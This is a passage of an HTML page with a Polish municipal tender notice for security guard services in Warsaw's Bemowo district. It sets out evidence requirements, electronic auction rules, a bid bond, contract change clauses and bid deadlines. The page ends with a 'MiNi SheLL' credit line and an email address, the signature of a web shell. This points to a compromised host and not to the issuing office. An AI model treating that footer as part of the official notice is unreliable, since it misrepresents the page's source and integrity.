podmiotowych środków dowodowych:<br/>a) Wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie<br/>ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są wykonywane; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać ww. dowodów – oświadczenie Wykonawcy –<br/>potwierdzające spełnienie warunku udziału w postępowaniu o którym mowa w Rozdziale VII ust. 2 pkt 4 lit. a;<br/>b) Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, które będą świadczyć usługi ochrony, posiadającymi<br/>ważne legitymacje kwalifikowanych pracowników ochrony fizycznej zgodnie z art. 26 i art. 27 ustawy z dnia z dnia 22 sierpnia 1997r.<br/>o ochronie osób i mienia (t.j. Dz. U z 2021 r. poz. 1995 z późn. zm.) wraz z informacją o podstawie dysponowania tymi osobami –<br/>potwierdzający spełnienie warunku udziału w postępowaniu o którym mowa w Rozdziale VII ust. 2 pkt 4 lit. b.<br/>Okresy wyrażone w latach lub miesiącach, o których mowa w pkt. 2 lit a, liczy się wstecz od dnia, w którym upływa termin składania<br/>ofert.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Wykonawca wykazujący swoje zdolności techniczne oraz zawodowe może uczynić to jedynie w zakresie, w którym sam<br/>je nabył. Jeśli doświadczenie zostało nabyte w ramach konsorcjum to przekazaniu podlegają zasoby powstałe jedynie w<br/>granicach wykonania prac przez dany podmiot.<br/>4. Wstępnym potwierdzeniem spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania będzie złożone wraz z ofertą oświadczenie stanowiące załącznik nr 3 do SWZ.<br/>5. W odniesieniu do warunków dotyczących zdolności technicznej lub zawodowej, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te<br/>zdolności są wymagane.<br/>6. W przypadku, o którym mowa w ust. 5 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>7. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>8. W celu dokonania oceny, czy Wykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte<br/>wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje<br/>rzeczywisty dostęp do ich zasobów, Zamawiający żąda dokumentów, z których wynikać będzie co najmniej:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których<br/>wskazane zdolności dotyczą.<br/>9. Zamawiający oceni, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu. Wzór zobowiązania<br/>stanowi załącznik nr 4 do SWZ.<br/>10. W przypadku, gdy Wykonawca polega na zdolnościach zawodowych podmiotów udostępniających zasoby,<br/>Zamawiający zbada czy nie zachodzą wobec innych podmiotów podstawy wykluczenia, o których mowa w art. 108 ust. 1<br/>ustawy Pzp.<br/>11. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby, nie potwierdzają spełnienia przez<br/>Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa<br/>w art. 108 ust. 1 ustawy, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>1) zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>2) wykazał, że samodzielnie spełnia warunki udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.3.1.) Adres internetowy aukcji: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">6.3.2.) Opis aukcji elektronicznej: </h3> 4. Zamawiający przewiduje dokonanie wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej, wg<br/>następujących zasad:<br/>1) Zamawiający przeprowadzi aukcję elektroniczną, jeżeli zostaną złożone, co najmniej 2 oferty niepodlegające odrzuceniu.<br/>Zaproszenie do udziału w aukcji elektronicznej zostanie wysłane drogą elektroniczną na adres e-mail wskazany przez<br/>Wykonawcę w Formularzu Oferty. Adres strony internetowej na której zostanie przeprowadzona aukcja elektroniczna:<br/>https://zamowienia.um.warszawa.pl<br/>2) Elementy, których wartości będą przedmiotem aukcji elektronicznej:<br/>- jedynym elementem oceny ofert w aukcji elektronicznej jest cena brutto oferty za realizację przedmiotowego zamówienia.<br/>Ceną wyjściową w aukcji elektronicznej dla każdego Wykonawcy jest cena brutto zaproponowana przez danego<br/>Wykonawcę w złożonej ofercie.<br/>3) W toku aukcji elektronicznej Wykonawcy za pomocą formularza umieszczonego na stronie internetowej, umożliwiającego<br/>wprowadzenie niezbędnych danych w trybie bezpośredniego połączenia z tą stroną, składają kolejne korzystniejsze<br/>postąpienia, podlegające automatycznej ocenie i klasyfikacji.<br/>4) Informacje dotyczące przebiegu aukcji elektronicznej:<br/>a) postąpienia, pod rygorem nieważności, składa się opatrzone bezpiecznym podpisem elektronicznym weryfikowanym za<br/>pomocą ważnego kwalifikowanego certyfikatu.<br/>b) postąpienia składane w toku aukcji elektronicznej będą podlegały automatycznej ocenie i klasyfikacji zgodnie ze wzorem<br/>określonym w rozdziale XVIII ust. 1 pkt 1) SWZ.<br/>c) oferta złożona przez Wykonawcę przestaje wiązać, jeżeli złoży on korzystniejszą ofertę w toku aukcji.<br/>d) Zamawiający przewiduje zastosowanie mechanizmu dogrywek.<br/>5) Zamawiający określa minimalne postąpienie na kwotę 7.000,00 PLN.<br/>6) Wymagania dotyczące rejestracji i identyfikacji Wykonawców w aukcji elektronicznej:<br/>a) Zamawiający zaprosi drogą elektroniczną do udziału w aukcji elektronicznej Wykonawców, których oferty nie zostały<br/>odrzucone. Zamawiający otworzy aukcję elektroniczną w terminie nie krótszym niż 2 dni robocze od przekazania<br/>zaproszenia.<br/>b) Wykonawcy chcący wziąć udział w aukcji elektronicznej muszą się zalogować na platformie aukcyjnej za pomocą danych<br/>uwierzytelniających przekazanych przez operatora platformy aukcyjnej Wykonawcom, którym Zamawiający przekazał zaproszenie do udziału w aukcji elektronicznej.<br/>7) Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania:<br/>a) aukcja jednoetapowa,<br/>b) czas trwania aukcji: 15 minut<br/>8) Aukcja elektroniczna zostanie zamknięta gdy w podstawowym czasie nie zostanie złożona żadna oferta lub, gdy w ciągu<br/>3 minut od złożenia oferty przez jednego<br/>z Wykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niż po upływie 15 minut od otwarcia aukcji.<br/>9) Po zakończeniu aukcji elektronicznej Wykonawca, którego oferta została wybrana jako najkorzystniejsza, przystępując do<br/>zawarcia umowy składa zaktualizowany Formularz cenowy. Ceny jednostkowe brutto w zaktualizowanym formularzu<br/>cenowym muszą zostać określone tak, aby suma wartości brutto dla wyszczególnionych w formularzu cenowym czynności<br/>wynikająca z przemnożenia cen jednostkowych i ilości nie przekroczyła ceny brutto wylicytowanej.<br/>Zaktualizowane oświadczenie Wykonawcy według wzoru stanowiącego załącznik nr 2 do SWZ musi być złożone w<br/>oryginale w postaci dokumentu elektronicznego przy użyciu platformy zakupowej Zamawiającego, podpisany przez osobę<br/>upoważnioną<br/>do reprezentowania Wykonawcy.<br/>10) W przypadku nie przeprowadzenia aukcji lub, gdy po jej przeprowadzeniu nie ulegnie zmianie cena brutto,<br/>najkorzystniejsza oferta zostanie wybrana w sposób wskazany w Rozdziale XVIII ust. 1 SWZ.<br/>11) W Formularzu oferty (załącznik nr 2 do SWZ) należy wpisać osobę uprawnioną do składania ofert w imieniu Wykonawcy<br/>w trakcie aukcji elektronicznej (dysponującą bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego<br/>kwalifikowanego certyfikatu). W przypadku nie wskazania osoby uprawnionej, Zamawiający uzna, że do składania postąpień<br/>w aukcji upoważniona jest osoba/osoby podpisująca/e ofertę. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta musi być zabezpieczona wadium w wysokości 6 000,00 PLN (sześć tysięcy złotych i 00/100).<br/>2. Wadium należy wnieść przed upływem terminu składania ofert (data i godzina), określonym w Rozdziale XIV ust. 5.<br/>3. Za wadium wniesione w terminie uważa się:<br/>1) dla wadium wnoszonego w pieniądzu - uznanie rachunku bankowego przez bank Zamawiającego przed upływem terminu<br/>składania ofert (data i godzina);<br/>2) dla wadium wnoszonego w formie innej niż pieniężna - złożenie razem z ofertą na platformie zakupowej Zamawiającego<br/>(data i godzina).<br/>4. Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą.<br/>5. Wadium można wnieść w jednej lub kilku niżej wymienionych formach (w zależności od wyboru Wykonawcy):<br/>1) pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego:<br/>Dzielnica Bemowo m.st. Warszawy, nr 03 1030 1508 0000 0005 5000 2043<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu<br/>Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 poz. 319,836 i 1572), zwanej dalej PARP.<br/>6. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie:<br/>1) obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 98<br/>ust. 6 ustawy Pzp;<br/>2) nie zawierały postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego<br/>do Gwaranta/Poręczyciela;<br/>3) jednoznacznie wskazywały podmiot, który złożył ofertę.<br/>Nieuwzględnienie powyższego w treści gwarancji/poręczenia spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt<br/>14 ustawy Pzp.<br/>7. Wadium w formie gwarancji lub poręczenia powinno być wniesione w oryginale w postaci dokumentu elektronicznego<br/>podpisanego kwalifikowanym podpisem elektronicznym przez Gwaranta/Poręczyciela.<br/>8. Wadium wnoszone w poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych i<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu PARP musi zawierać<br/>stwierdzenie, że gwarant zobowiązuje się nieodwołalnie i bezwarunkowo pokryć wszelkie zobowiązania Wykonawcy wobec<br/>Zamawiającego wynikające z zapisów SWZ dotyczących wadium, do wysokości gwarantowanej kwoty, na pierwsze żądanie<br/>Zamawiającego przedstawione gwarantowi w formie pisemnej w okresie obowiązywania poręczenia (gwarancji).<br/>9. Ww. gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych.<br/>10. Przedłużenia ważności wadiów w formie innej niż pieniądz, w sytuacjach określonych w ustawie oraz z zachowaniem<br/>postanowień ust. 6-9 niniejszego Rozdziału, należy wnosić za pośrednictwem platformy<br/>https://zamowienia.um.warszawa.pl/servlet/HomeServlet. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, załączenie do Oferty w systemie:<br/>1) Oświadczenie, o którym mowa w pkt. 2) dotyczące każdego z Wykonawców wspólnie ubiegających się o zamówienie,<br/>2) oświadczenia z którego wynika, które usługi wykonają poszczególni Wykonawcy (sporządzonego wg wzoru określonego<br/>w Załączniku nr 5 do SWZ),<br/>3) ewentualnie pełnomocnictwo(-a) – w postaci pliku,<br/>4) w przypadku, gdy Oferta zawiera informacje stanowiące tajemnice przedsiębiorstwa, Wykonawca musi załączyć dowody,<br/>o których mowa w Rozdziale XIII ust. 4 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu w przypadku:<br/>1) wystąpienia „siły wyższej”, przez którą strony rozumieją klęski żywiołowe, stan wyjątkowy, działania terrorystyczne, strajk<br/>powszechny, nowe akty prawne lub decyzje właściwych władz, a także działania lub zaniechania działania organów<br/>państwowych, samorządowych lub osób trzecich uniemożliwiających terminową realizację zamówienia, o okres<br/>przekraczający czas trwania przeszkody w wykonaniu zamówienia;<br/>2) wstrzymania realizacji przedmiotu umowy na podstawie decyzji organów administracji państwowej lub samorządowej;<br/>3) przedłużenia terminu wykonania przedmiotu Umowy w związku z wprowadzoną zmianą Umowy dokonaną na podstawie<br/>ust. 2 o czas jaki trwała przyczyna o której mowa w pkt 1), oraz pkt 2) powyżej.<br/>3. W przypadku zmian wskaźników określonych w art. 436 pkt 4) lit. b) ustawy Pzp Zamawiający przewiduje możliwość<br/>dokonania zmiany wynagrodzenia Wykonawcy określonego w umowie.<br/>4. Wprowadzenie zmiany wskazanej w ust. 3 wymaga złożenia przez Wykonawcę w terminie 30 dni od daty wejścia w życie<br/>nowych przepisów:<br/>1) wniosku w sprawie odpowiedniej zmiany wynagrodzenia,<br/>2) szczegółowego uzasadnienia wpływu zmian wskaźników na koszty wykonania zamówienia przez Wykonawcę,<br/>zawierającego w szczególności kalkulację uwzględniającą, zależnie od zakresu ogłoszonych zmian:<br/>a) kalkulację przedstawiającą proponowane ceny jednostkowe i wartości (netto, brutto);<br/>b) liczbę pracowników zatrudnionych przy realizacji umowy;<br/>c) formę zatrudnienia ww. pracowników;<br/>d) wskazanie liczby pracowników objętych ubezpieczeniami społecznymi lub ubezpieczeniem zdrowotnym;<br/>e) wskazanie liczby pracowników zatrudnionych przy realizacji umowy objętych pracowniczymi planami kapitałowymi;<br/>f) kopii, poświadczonego za zgodność z oryginałem, dokumentu potwierdzającego objęcie podatkiem od towarów i usług lub<br/>podatkiem akcyzowym, dostaw lub usług świadczonych przez Wykonawcę w związku z realizacją Umowy.<br/>5. Jeżeli do upływu 30 dni Wykonawca nie zwróci się do Zamawiającego o zmianę wysokości wynagrodzenia, Zamawiający<br/>uzna, że zmiana przepisów nie ma wpływu na koszty wykonania przedmiotu umowy przez Wykonawcę.<br/>6. Wprowadzone aneksem zmiany wynagrodzenia do umowy będą obowiązywały od pierwszego dnia miesiąca<br/>następującego po zawarciu aneksu.<br/>7. Wysokość wynagrodzenia Wykonawcy nie podlega zmianie, jeżeli zmiana wskaźników określonych w art. 436 pkt 4) lit. b)<br/>ustawy Pzp zostanie wprowadzona aktami prawnymi opublikowanymi na dzień wszczęcia postępowania o udzielenie<br/>zamówienia publicznego.<br/>8. W przypadku zmiany ceny materiałów lub kosztów związanych z realizacją przedmiotu umowy, wynagrodzenie<br/>Wykonawcy określone w § 3 ust. 1 ulegnie zmianie, na zasadach określonych poniżej.<br/>9. Zmiany wynagrodzenia dokonuje się na podstawie wniosku złożonego przez jedną ze stron umowy nie wcześniej niż po<br/>upływie 12 miesięcy od dnia zawarcia Umowy.<br/>10. Zmiana wynagrodzenia przysługuje w przypadku, gdy z komunikatów Prezesa Głównego Urzędu Statystycznego (dalej<br/>jako „Prezes GUS”) ogłaszanych po zawarciu umowy i dotyczących czterech następujących po sobie kwartałów wynika, że<br/>suma ogłaszanych wartości zmian cen towarów<br/>i usług konsumpcyjnych wynosi więcej niż 5,0%.<br/>11. Wniosek o zmianę może dotyczyć wyłącznie wynagrodzenia za prace pozostałe do zrealizowania<br/>i odbioru po dniu złożenia wniosku.<br/>12. Strony dokonają zmiany wynagrodzenia zgodnie z art. 439 ustawy Pzp w formie pisemnego aneksu do umowy.<br/>13. Ustalone wynagrodzenie będzie waloryzowane jednokrotnie o wartość wskaźnika cen towarów<br/>i usług, publikowanego w komunikacie Prezesa GUS, zgodnie ze wzorem opisanym w ust. 16.<br/>Ciąg dalszy rodzaju i zakresu zmian umowy oraz warunki ich wprowadzenia zawarte są w<br/>Projektowanych postanowieniach umowy stanowiących załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com